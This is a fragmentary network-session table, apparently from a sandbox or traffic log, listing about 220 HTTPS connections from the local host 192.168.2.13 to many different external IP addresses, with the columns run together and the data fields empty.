                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20373192.168.2.134732480.175.39.191443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20374192.168.2.1353456168.199.245.209443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20375192.168.2.1344212142.93.37.38443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20376192.168.2.1333404186.22.76.158443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20377192.168.2.1352138221.64.218.148443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20378192.168.2.133866299.187.48.81443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20379192.168.2.1342678140.56.107.114443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20380192.168.2.1340770153.147.255.181443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20381192.168.2.1351304155.163.103.32443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20382192.168.2.13589324.51.81.14443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20383192.168.2.135941249.182.108.2443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20384192.168.2.1358986187.86.223.26443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20385192.168.2.1349846108.42.244.38443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20386192.168.2.134273870.16.177.32443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20387192.168.2.133555223.102.28.241443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20388192.168.2.134207293.109.34.233443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20389192.168.2.1354942190.137.147.153443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20390192.168.2.134863073.100.37.124443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20391192.168.2.134195853.184.67.242443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20392192.168.2.1354528222.104.117.158443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20393192.168.2.135196449.115.87.174443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20394192.168.2.1344678117.162.235.223443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20395192.168.2.134706493.92.95.6443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20396192.168.2.135699223.138.40.74443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20397192.168.2.1354922157.89.227.129443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20398192.168.2.1351942207.102.91.237443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20399192.168.2.134118282.137.41.140443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20400192.168.2.133907666.35.60.15443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20401192.168.2.133338219.25.18.226443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20402192.168.2.1358186189.2.119.57443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20403192.168.2.133783886.65.188.73443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20404192.168.2.1343868111.7.196.124443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20405192.168.2.133313623.127.140.155443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20406192.168.2.1349680121.116.32.22443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20407192.168.2.1349914129.168.18.243443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20408192.168.2.1345660176.145.15.72443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20409192.168.2.134973441.152.148.231443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20410192.168.2.1338122101.16.227.190443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20411192.168.2.135901081.42.107.40443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20412192.168.2.1350484188.85.74.168443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20413192.168.2.1341192207.47.239.95443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20414192.168.2.1342886170.17.113.203443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20415192.168.2.134028476.12.253.254443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20416192.168.2.1350584126.206.81.238443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20417192.168.2.1349108115.209.146.118443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20418192.168.2.135221425.241.1.113443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20419192.168.2.1337990205.69.111.160443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20420192.168.2.1352946176.176.163.203443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20421192.168.2.134116017.104.159.241443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20422192.168.2.1352032193.110.156.4443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20423192.168.2.13506669.191.143.217443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20424192.168.2.1335792153.91.79.143443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20425192.168.2.1356304217.171.248.82443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20426192.168.2.134190480.138.209.25443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20427192.168.2.133983471.157.203.8443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20428192.168.2.13332308.77.29.207443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20429192.168.2.133620414.57.135.214443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20430192.168.2.1360134193.101.160.247443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20431192.168.2.135657468.217.22.93443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20432192.168.2.1343864212.200.47.15443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20433192.168.2.1355128169.112.198.173443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20434192.168.2.133838859.239.240.20443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20435192.168.2.135454232.92.37.100443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20436192.168.2.1338802194.199.32.48443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20437192.168.2.1347746189.146.91.196443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20438192.168.2.133648644.161.197.239443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20439192.168.2.1355004144.218.116.240443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20440192.168.2.13543005.235.120.90443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20441192.168.2.1356916159.93.77.247443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20442192.168.2.1357276132.167.6.69443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20443192.168.2.1349520218.141.37.166443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20444192.168.2.134619249.7.186.62443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20445192.168.2.1357914124.149.247.33443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20446192.168.2.1353514193.80.121.36443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20447192.168.2.1354388180.16.170.235443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20448192.168.2.134533898.20.143.211443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20449192.168.2.134675841.34.234.207443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20450192.168.2.135783019.90.188.177443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20451192.168.2.133661282.181.215.229443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20452192.168.2.136083645.105.20.186443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20453192.168.2.1359806110.214.50.8443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20454192.168.2.135495896.115.60.166443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20455192.168.2.1351988116.34.248.212443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20456192.168.2.135682060.100.217.239443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20457192.168.2.1333996120.143.213.136443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20458192.168.2.1333006161.8.110.219443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20459192.168.2.133568888.222.164.61443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20460192.168.2.134061697.105.106.35443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20461192.168.2.1341160149.6.165.250443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20462192.168.2.1336782120.93.87.233443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20463192.168.2.1343034106.73.75.252443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20464192.168.2.134691012.56.43.201443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20465192.168.2.1351112136.160.32.198443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20466192.168.2.1339170107.29.235.122443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20467192.168.2.1343676170.23.112.236443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20468192.168.2.1355714132.144.59.55443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20469192.168.2.1360330162.109.187.202443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20470192.168.2.135764862.160.118.170443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20471192.168.2.1335902145.247.165.154443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20472192.168.2.1340394143.22.130.209443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20473192.168.2.133682444.53.188.253443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20474192.168.2.1349444223.29.127.163443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20475192.168.2.1347244125.216.122.117443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20476192.168.2.13543605.90.83.14443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20477192.168.2.13407842.210.102.88443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20478192.168.2.134426857.201.80.80443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20479192.168.2.1358000181.231.140.39443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20480192.168.2.134018670.20.214.227443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20481192.168.2.135866618.100.220.252443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20482192.168.2.1353032125.139.122.94443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20483192.168.2.1336352102.46.255.62443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20484192.168.2.1347724216.240.226.200443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20485192.168.2.1334128172.130.96.99443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20486192.168.2.135196096.116.97.165443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20487192.168.2.1347114222.85.57.64443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20488192.168.2.133614653.127.61.140443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20489192.168.2.1345400121.52.65.127443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20490192.168.2.1341436128.66.248.161443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20491192.168.2.136077884.202.119.184443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20492192.168.2.133395285.216.115.203443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20493192.168.2.1335290122.52.200.120443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20494192.168.2.1344666129.63.135.102443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20495192.168.2.1356428151.71.191.122443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20496192.168.2.1339394192.19.18.9443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20497192.168.2.13604324.228.210.164443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20498192.168.2.135699061.41.184.217443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20499192.168.2.135285652.16.231.66443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20500192.168.2.1333900108.223.89.55443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20501192.168.2.1355602210.61.28.163443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20502192.168.2.1354506218.64.78.229443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20503192.168.2.1333688195.198.241.116443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20504192.168.2.133796291.231.184.208443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20505192.168.2.1358766198.103.24.217443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20506192.168.2.1347348122.206.176.93443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20507192.168.2.1344104201.204.116.79443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20508192.168.2.1347760111.64.250.245443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20509192.168.2.1358834155.25.248.54443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20510192.168.2.1353848117.187.188.253443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20511192.168.2.135725679.23.130.24443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20512192.168.2.134920236.117.17.28443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20513192.168.2.134219637.218.231.150443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20514192.168.2.133942097.162.221.253443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20515192.168.2.135700641.74.101.156443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20516192.168.2.1340758168.207.16.173443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20517192.168.2.133646071.106.87.85443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20518192.168.2.1340420202.213.241.182443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20519192.168.2.1334476157.197.55.53443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20520192.168.2.133406490.52.154.157443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20521192.168.2.1336464132.14.216.50443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20522192.168.2.134564485.225.186.243443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20523192.168.2.133672260.139.44.249443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20524192.168.2.135681066.79.232.19443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20525192.168.2.135929680.191.174.21443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20526192.168.2.1342540129.169.70.150443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20527192.168.2.1354826134.219.9.75443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20528192.168.2.134910671.23.42.4443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20529192.168.2.1346864171.101.173.199443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20530192.168.2.1348132171.117.93.1443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20531192.168.2.134840287.93.183.5443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20532192.168.2.133764864.60.74.21443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20533192.168.2.135941432.220.197.136443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20534192.168.2.1353510210.69.175.168443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20535192.168.2.1337668115.63.243.13443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20536192.168.2.135928051.154.73.189443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20537192.168.2.1358566155.139.148.82443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20538192.168.2.13551124.135.223.41443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20539192.168.2.133652682.12.218.111443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20540192.168.2.1349988169.216.95.3443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20541192.168.2.133932457.30.223.7443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20542192.168.2.135002024.250.160.2443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20543192.168.2.1334516111.247.191.132443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20544192.168.2.1342172188.59.179.65443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20545192.168.2.1360156181.176.174.49443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20546192.168.2.1334508114.76.97.158443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20547192.168.2.1348752157.191.44.224443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20548192.168.2.1334230119.106.40.73443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20549192.168.2.134071064.2.16.149443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20550192.168.2.134905423.215.27.188443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20551192.168.2.1352086172.70.186.137443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20552192.168.2.134330685.178.66.121443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20553192.168.2.1341804179.104.15.212443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20554192.168.2.1354874142.199.171.166443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20555192.168.2.133521618.70.191.233443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20556192.168.2.1357246172.66.133.52443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20557192.168.2.1339490179.123.85.55443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20558192.168.2.1351502114.23.83.198443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20559192.168.2.135888649.37.11.173443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20560192.168.2.1342002185.196.234.41443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20561192.168.2.1350830154.22.51.52443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20562192.168.2.1359406152.48.103.112443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20563192.168.2.133944890.100.11.205443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20564192.168.2.133574865.58.130.108443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20565192.168.2.1351738185.61.48.69443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20566192.168.2.1346706143.90.61.92443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20567192.168.2.13408904.86.221.32443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20568192.168.2.1359986177.179.212.54443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20569192.168.2.133529464.114.121.45443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20570192.168.2.135725067.199.165.101443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20571192.168.2.1352510109.236.52.215443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20572192.168.2.133700295.182.21.37443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20573192.168.2.135724897.226.185.93443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20574192.168.2.13386302.238.28.180443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20575192.168.2.1358170167.230.84.94443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20576192.168.2.1342982143.228.222.211443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20577192.168.2.133401665.95.78.164443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20578192.168.2.135064695.56.49.60443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20579192.168.2.1344908112.72.10.97443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20580192.168.2.1349082162.141.222.136443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20581192.168.2.133305866.151.201.55443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20582192.168.2.1358316191.147.98.215443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20583192.168.2.1335316221.221.181.92443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20584192.168.2.1340930212.97.139.96443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20585192.168.2.133688243.218.119.75443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20586192.168.2.1355540191.17.191.146443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20587192.168.2.134548427.52.56.12443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20588192.168.2.1352566189.158.38.43443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20589192.168.2.133740618.161.107.87443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20590192.168.2.1345198154.119.19.219443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20591192.168.2.134613459.85.134.77443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20592192.168.2.133987485.199.121.171443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20593192.168.2.1360064212.213.134.235443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        20594192.168.2.134718490.243.208.41443
                                        TimestampBytes transferredDirectionData


